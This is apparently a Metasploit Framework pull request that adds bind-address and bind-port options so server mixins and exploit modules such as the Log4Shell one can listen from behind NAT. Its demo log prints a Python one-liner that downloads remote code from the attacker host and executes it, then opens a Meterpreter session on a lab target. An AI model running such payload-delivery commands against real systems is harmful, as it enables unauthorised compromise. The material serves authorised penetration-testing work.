### PR TITLE
Update service mixins for NAT options

### DIFF
--- a/lib/msf/core/exploit/remote/dns/server.rb
+++ b/lib/msf/core/exploit/remote/dns/server.rb
@@ -102,11 +102,11 @@ module Server
   def start_service
     begin
 
-      comm = _determine_server_comm(datastore['SRVHOST'])
+      comm = _determine_server_comm(bindhost)
       self.service = Rex::ServiceManager.start(
         Rex::Proto::DNS::Server,
-        datastore['SRVHOST'],
-        datastore['SRVPORT'],
+        bindhost,
+        bindport,
         datastore['DnsServerUdp'],
         datastore['DnsServerTcp'],
         !datastore['DISABLE_NS_CACHE'],

--- a/lib/msf/core/exploit/remote/http_server.rb
+++ b/lib/msf/core/exploit/remote/http_server.rb
@@ -118,31 +118,17 @@ module Exploit::Remote::HttpServer
 
     check_dependencies
 
-    comm = datastore['ListenerComm']
-    if (comm.to_s == "local")
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
-
-    # Default the server host and port to what is required by the mixin.
-    opts = {
-      'ServerHost' => datastore['SRVHOST'],
-      'ServerPort' => datastore['SRVPORT'],
-      'Comm'       => comm
-    }.update(opts)
-
     # Start a new HTTP server service.
     self.service = Rex::ServiceManager.start(
       Rex::Proto::Http::Server,
-      opts['ServerPort'].to_i,
-      opts['ServerHost'],
+      (opts['ServerPort'] || bindport).to_i,
+      opts['ServerHost'] || bindhost,
       datastore['SSL'], # XXX: Should be in opts, need to test this
       {
         'Msf'        => framework,
         'MsfExploit' => self,
       },
-      opts['Comm'],
+      opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
       datastore['SSLCert'],
       datastore['SSLCompression'],
       datastore['SSLCipher'],
@@ -172,19 +158,10 @@ module Exploit::Remote::HttpServer
       print_status("Intentionally using insecure SSL compression. Your operating system might not respect this!")
     end
 
+    print_status("Using URL: #{proto}://#{srvhost_addr}#{uopts['Path']}")
 
-    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
-
-    if opts['ServerHost'] == '0.0.0.0'
-      print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
-    end
-
-    if datastore['SendRobots']
-      add_robots_resource
-    end
-
+    add_robots_resource if datastore['SendRobots']
     add_resource(uopts)
-
   end
 
   def add_robots_resource

--- a/lib/msf/core/exploit/remote/http_server.rb
+++ b/lib/msf/core/exploit/remote/http_server.rb
@@ -158,7 +158,15 @@ module Exploit::Remote::HttpServer
       print_status("Intentionally using insecure SSL compression. Your operating system might not respect this!")
     end
 
-    print_status("Using URL: #{proto}://#{srvhost_addr}#{uopts['Path']}")
+    netloc = srvhost_addr
+    if (proto == 'http' && srvport  != 80) || (proto == 'https' && srvport != 443)
+      if Rex::Socket.is_ipv6?(netloc)
+        netloc = "[#{netloc}]:#{srvport}"
+      else
+        netloc = "#{netloc}:#{srvport}"
+      end
+    end
+    print_status("Using URL: #{proto}://#{netloc}#{uopts['Path']}")
 
     add_robots_resource if datastore['SendRobots']
     add_resource(uopts)

--- a/lib/msf/core/exploit/remote/ldap/server.rb
+++ b/lib/msf/core/exploit/remote/ldap/server.rb
@@ -75,11 +75,11 @@ module Msf
       # Starts the server
       #
       def start_service
-        comm = _determine_server_comm(datastore['SRVHOST'])
+        comm = _determine_server_comm(bindhost)
         self.service = Rex::ServiceManager.start(
           Rex::Proto::LDAP::Server,
-          datastore['SRVHOST'],
-          datastore['SRVPORT'],
+          bindhost,
+          bindport,
           datastore['LdapServerUdp'],
           datastore['LdapServerTcp'],
           read_ldif,

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -172,6 +172,8 @@ protected
   # Determines appropriate listener comm
   #
   def _determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s)
+    comm = nil
+
     case srv_comm
     when 'local'
       comm = ::Rex::Socket::Comm::Local
@@ -180,7 +182,9 @@ protected
       raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
       raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
     when nil, ''
-      comm = Rex::Socket::SwitchBoard.best_comm(ip)
+      unless ip.nil?
+        comm = Rex::Socket::SwitchBoard.best_comm(ip)
+      end
     else
       raise(RuntimeError, "SocketServer Comm '#{srv_comm}' is invalid")
     end

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -189,7 +189,7 @@ protected
       raise(RuntimeError, "SocketServer Comm '#{srv_comm}' is invalid")
     end
 
-    comm
+    comm || ::Rex::Socket::Comm::Local
   end
 
   def via_string(comm)

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -26,6 +26,8 @@ module Exploit::Remote::SocketServer
 
     register_advanced_options(
       [
+        OptAddress.new('ListenerBindAddress', [ false, 'The specific IP address to bind to if different from SRVHOST']),
+        OptPort.new('ListenerBindPort', [false, 'The port to bind to if different from SRVPORT']),
         OptString.new('ListenerComm', [ false, 'The specific communication channel to use for this service'])
       ], Msf::Exploit::Remote::SocketServer
     )
@@ -116,6 +118,18 @@ module Exploit::Remote::SocketServer
   #
   def srvport
     datastore['SRVPORT']
+  end
+
+  #
+  # Returns the address that the service is bound to. Can be different from SRVHOST when the ListenerBindAddress is
+  # specified and can be used for binding to a specific address when NATing is in place.
+  #
+  def bindhost
+    datastore['ListenerBindAddress'].blank? ? datastore['SRVHOST'] : datastore['ListenerBindAddress']
+  end
+
+  def bindport
+    datastore['ListenerBindPort'].blank? ? datastore['SRVPORT'] : datastore['ListenerBindPort']
   end
 
   #

--- a/lib/msf/core/exploit/remote/tcp_server.rb
+++ b/lib/msf/core/exploit/remote/tcp_server.rb
@@ -26,7 +26,6 @@ module Exploit::Remote::TcpServer
 
     register_advanced_options(
       [
-        OptString.new('ListenerComm', [ false, 'The specific communication channel to use for this service']),
         OptBool.new('SSLCompression', [ false, 'Enable SSL/TLS-level compression', false ]),
         OptString.new('SSLCipher',    [ false, 'String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"']),
         Opt::SSLVersion
@@ -56,11 +55,11 @@ module Exploit::Remote::TcpServer
   #
   def start_service(opts = {})
     begin
-      comm = _determine_server_comm(srvhost)
+      comm = _determine_server_comm(bindhost)
 
       self.service = Rex::Socket::TcpServer.create({
-        'LocalHost'      => srvhost,
-        'LocalPort'      => srvport,
+        'LocalHost'      => bindhost,
+        'LocalPort'      => bindport,
         'SSL'            => ssl,
         'SSLCert'        => ssl_cert,
         'SSLCipher'      => ssl_cipher,
@@ -92,7 +91,7 @@ module Exploit::Remote::TcpServer
         print_line(" ")
         print_error("Could not start the TCP server: #{e}.")
         print_error(
-          "This module is configured to use a privileged TCP port (#{srvport}). " +
+          "This module is configured to use a privileged TCP port (#{bindport}). " +
           "On Unix systems, only the root user account is allowed to bind to privileged ports." +
           "Please run the framework as root to use this module."
         )
@@ -107,8 +106,8 @@ module Exploit::Remote::TcpServer
     end
 
     via = via_string(comm)
-    hoststr = Rex::Socket.is_ipv6?(srvhost) ? "[#{srvhost}]" : srvhost
-    print_status("Started service listener on #{hoststr}:#{srvport} #{via}")
+    hoststr = Rex::Socket.is_ipv6?(bindhost) ? "[#{bindhost}]" : bindhost
+    print_status("Started service listener on #{hoststr}:#{bindport} #{via}")
   end
 
   #

--- a/lib/rex/proto/proxy/socks4a.rb
+++ b/lib/rex/proto/proxy/socks4a.rb
@@ -373,7 +373,11 @@ class Socks4a
   def start
       begin
         # create the servers main socket (ignore the context here because we don't want a remote bind)
-        @server = Rex::Socket::TcpServer.create( 'LocalHost' => @opts['ServerHost'], 'LocalPort' => @opts['ServerPort'] )
+        @server = Rex::Socket::TcpServer.create(
+          'LocalHost' => @opts['ServerHost'],
+          'LocalPort' => @opts['ServerPort'],
+          'Comm' => @opts['Comm']
+        )
         # signal we are now running
         @running = true
         # start the servers main thread to pick up new clients

--- a/lib/rex/proto/proxy/socks5/server.rb
+++ b/lib/rex/proto/proxy/socks5/server.rb
@@ -37,7 +37,11 @@ module Socks5
     def start
       begin
         # create the servers main socket (ignore the context here because we don't want a remote bind)
-        @server = Rex::Socket::TcpServer.create('LocalHost' => @opts['ServerHost'], 'LocalPort' => @opts['ServerPort'])
+        @server = Rex::Socket::TcpServer.create(
+          'LocalHost' => @opts['ServerHost'],
+          'LocalPort' => @opts['ServerPort'],
+          'Comm' => @opts['Comm']
+        )
         # signal we are now running
         @running = true
         # start the servers main thread to pick up new clients

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -60,8 +60,9 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     @rsock = Rex::Socket::Tcp.create(
-      'LocalHost' => datastore['SRVHOST'],
-      'LocalPort' => datastore['SRVPORT'],
+      'LocalHost' => bindhost,
+      'LocalPort' => bindport,
+      'Comm' => _determine_server_comm(bindhost),
       'Server' => true,
       'Timeout' => datastore['TIMEOUT'],
       'Context' =>
@@ -88,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
       gss_provider: ntlm_provider
     )
 
-    print_status("Server is running. Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    print_status("Server is running. Listening on #{bindhost}:#{bindport}")
 
     server.run do
       print_line

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -8,6 +8,7 @@ require 'ruby_smb/gss/provider/ntlm'
 require 'metasploit/framework/hashes/identify'
 
 class MetasploitModule < Msf::Auxiliary
+  include ::Msf::Exploit::Remote::SocketServer
   include ::Msf::Exploit::Remote::SMB::Server::HashCapture
 
   def initialize

--- a/modules/auxiliary/server/socks_proxy.rb
+++ b/modules/auxiliary/server/socks_proxy.rb
@@ -5,6 +5,7 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::SocketServer
 
   def initialize
     super(
@@ -24,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     register_options([
-      OptString.new('SRVHOST', [true, 'The address to listen on', '0.0.0.0']),
       OptPort.new('SRVPORT', [true, 'The port to listen on', 1080]),
       OptEnum.new('VERSION', [ true, 'The SOCKS version to use', '5', %w[4a 5] ]),
       OptString.new('USERNAME', [false, 'Proxy username for SOCKS5 listener'], conditions: %w[VERSION == 5]),
@@ -51,8 +51,9 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
-      'ServerPort' => datastore['SRVPORT'],
+      'ServerHost' => bindhost,
+      'ServerPort' => bindport,
+      'Comm' => _determine_server_comm(bindhost),
       'Context' => { 'Msf' => framework, 'MsfExploit' => self }
     }
 

--- a/modules/exploits/multi/http/log4shell_header_injection.rb
+++ b/modules/exploits/multi/http/log4shell_header_injection.rb
@@ -94,6 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
       ], conditions: %w[TARGET != Automatic]),
       OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic])
     ])
+    register_advanced_options([
+      OptPort.new('HttpListenerBindPort', [false, 'The port to bind to if different from HTTP_SRVPORT'])
+    ])
   end
 
   def check
@@ -190,7 +193,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # LDAP service
     start_service
     # HTTP service
-    start_http_service if target['RemoteLoad']
+    if target['RemoteLoad']
+      start_http_service('ServerPort' => (datastore['HttpListenerBindPort'].blank? ? datastore['HTTP_SRVPORT'] : datastore['HttpListenerBindPort']).to_i)
+    end
     # HTTP request initiator
     send_request_raw(
       'uri' => normalize_uri(target_uri),
@@ -251,30 +256,21 @@ class MetasploitModule < Msf::Exploit::Remote
   # msf/core/exploit/http/server.rb
   #
   def start_http_service(opts = {})
-    comm = datastore['ListenerComm']
-    if (comm.to_s == 'local')
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
-    # Default the server host / port
-    opts = {
-      'ServerHost' => datastore['SRVHOST'],
-      'ServerPort' => datastore['HTTP_SRVPORT'],
-      'Comm' => comm
-    }.update(opts)
     # Start a new HTTP server
     @http_service = Rex::ServiceManager.start(
       Rex::Proto::Http::Server,
-      opts['ServerPort'].to_i,
-      opts['ServerHost'],
+      (opts['ServerPort'] || bindport).to_i,
+      opts['ServerHost'] || bindhost,
       datastore['SSL'],
       {
         'Msf' => framework,
         'MsfExploit' => self
       },
-      opts['Comm'],
-      datastore['SSLCert']
+      opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
+      datastore['SSLCert'],
+      datastore['SSLCompression'],
+      datastore['SSLCipher'],
+      datastore['SSLVersion']
     )
     @http_service.server_name = datastore['HTTP::server_name']
     # Default the procedure of the URI to on_request_uri if one isn't
@@ -284,10 +280,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'Path' => resource_uri
     }.update(opts['Uri'] || {})
     proto = (datastore['SSL'] ? 'https' : 'http')
-    print_status("Serving Java code on: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
-    if (opts['ServerHost'] == '0.0.0.0')
-      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address}:#{opts['ServerPort']}#{uopts['Path']}")
+
+    netloc = opts['ServerHost'] || bindhost
+    http_srvport = (opts['ServerPort'] || bindport).to_i
+    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
+      if Rex::Socket.is_ipv6?(netloc)
+        netloc = "[#{netloc}]:#{http_srvport}"
+      else
+        netloc = "#{netloc}:#{http_srvport}"
+      end
     end
+    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")
+
     # Add path to resource
     @service_path = uopts['Path']
     @http_service.add_resource(uopts['Path'], uopts)


### PR DESCRIPTION
 This PR adds capabilities to the service mixins listed below to enable them to start listeners in NATed environments. It does so by adding two new datastore options, `ListenerBindAddress` and `ListenerBindPort`. These names are intentionally similar to the `ReverseListenerBindAddress` and `ReverseListenerBindPort` options that are registered by the reverse_* handlers<sup>[1,][1] [2][2]</sup> and the `ListenerComm` option already registered by the [SocketServer][3].

The ReverseListerBindAddress allows the port on which the handler is bound to be different from that specified in LHOST. When only LHOST is specified, that IP address must be one that the system running the payload can connect to. This isn't feasible if Metasploit is running in a network behind a NAT with a port forwarding configuration. In this scenario, the public IP address specified in LHOST can't be bound to by the handler, so the ReverseListenerBindAddress allows it to be overridden. This PR updates the codebase to apply the same relation between ReverseListenerBindAddress and LHOST to ListenerBindAddress and SRVHOST. It solves the same problem, in the same way, but for modules that need to start listening services such as HTTP, LDAP, SMB, etc. The BindPort options serve the same purpose, allowing the port on which the service is bound to be different from the one the target is connecting to.

The following service listeners were updated as part of this PR:
* socket_server
    * tcp_server
        * smb/server (no changes necessary, inherited from tcp_server)
        * http_server
        * ftp_server (no changes necessary, inherited from tcp_server)
    * ldap/server
    * dns/server

Messages in the context of a location that targets should connect to (like URLs) were left unchanged. Messages that displayed where the service was listening were updated to use the actual bound address. Any instances that are incorrect should be called out.

## Routing
Due to the way in which Metasploit's internal routing table works as provided by `Rex::Socket` if the `ListenerBindAddress` is to be routed through a session, then that session will be used as the comm to create the service. This is the exact say way that handlers work. An explicit comm can be specified using the `ListenerComm` and `ReverseListenerComm` options for services and handlers respectively.

## Demo

The following diagram outlines the topology of the network where 192.168.250.0/24 is the WAN on which the target Ubuntu system is and 192.168.199.0/24 is the LAN on which Metasploit Framework is running. The HTTP service and payload handler services are both running on Metasploit and the router has been configured with a port forward for both. In both cases, the port that is forwarded, is forwarded to the same port on the target, e.g. router:4444 to metasploit:4444.

```mermaid
graph TD
    target-- http request -->rp8888-- via router portfwd -->metasploit
    target-- payload -->rp4444-- via router portfwd -->metasploit

    subgraph wan [WAN 192.168.250.0/24]
    target([target 192.168.250.8])
    end

    subgraph router [router 192.168.250.126 & 192.168.199.1]
    rp4444[192.168.250.126:4444]
    rp8888[192.168.250.126:8888]
    end
    
    subgraph lan [LAN 192.168.199.0/24]
    metasploit([metasploit 192.168.199.3])
    end
```

When setting up Metasploit and the `exploit/multi/script/web_delivery` module, the first attempt that fails shows that the `SRVHOST` address can not be bound to because 192.168.250.126 is not an IP address on the system where Metasploit is running. The user sets the two necessary options, the new `ListenerBindAddress` for the HTTP service and the existing `ReverseListenerBindAddress` for the reverse_tcp payload handler service. With that in place, the module works as intended. In the generated command output, the public address specified by `SRVHOST` is clearly visible, showing what the target will connect to, while the staus output shows that the TCP handler is running on the private address.

```
msf6 exploit(multi/script/web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.250.126  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8888             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.126  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 192.168.199.3:4444 
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.250.126:8888).

msf6 exploit(multi/script/web_delivery) > set ListenerBindAddress 192.168.199.3
ListenerBindAddress => 192.168.199.3
msf6 exploit(multi/script/web_delivery) > set ReverseListenerBindAddress 192.168.199.3
ReverseListenerBindAddress => 192.168.199.3
msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 192.168.199.3:4444 
[*] Using URL: http://192.168.250.126/Wg9aLc4
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.250.126:8888/Wg9aLc4', context=ssl._create_unverified_context());exec(r.read());"

msf6 exploit(multi/script/web_delivery) > 
[*] 192.168.250.8    web_delivery - Delivering Payload (501 bytes)
[*] Sending stage (39804 bytes) to 192.168.250.8
[*] Meterpreter session 1 opened (192.168.199.3:4444 -> 192.168.250.8:54566 ) at 2022-02-28 16:07:04 -0500

msf6 exploit(multi/script/web_delivery) > 
```

## Testing

These changes are included in quite a few modules. Anything that starts an HTTP, FTP, LDAP, DNS, or SMB server using the provided mixins will have the new functionality.

- [x] Test a HTTP module (suggestion: exploit/multi/script/web_deliver)
- [x] Test a LDAP module (suggestion: exploit/multi/http/log4shell_header_injection)
- [x] Test a DNS module (suggestion: auxiliary/server/dns/native_server)
- [x] Test a TCP module

For each of the new modules, they should all continue to work as intended. The `ListenerBindAddress` and `ListenerBindPort` options should alter how the socket is bound as visible by `netstat` or a similar monitoring utility.

[1]: https://github.com/rapid7/metasploit-framework/blob/8e32809fccc803c9500320c9d05290fdf1dafb02/lib/msf/core/handler/reverse_tcp.rb#L49
[2]: https://github.com/rapid7/metasploit-framework/blob/8e32809fccc803c9500320c9d05290fdf1dafb02/lib/msf/core/handler/reverse_http.rb#L55
[3]: https://github.com/rapid7/metasploit-framework/blob/8e32809fccc803c9500320c9d05290fdf1dafb02/lib/msf/core/exploit/remote/socket_server.rb#L29
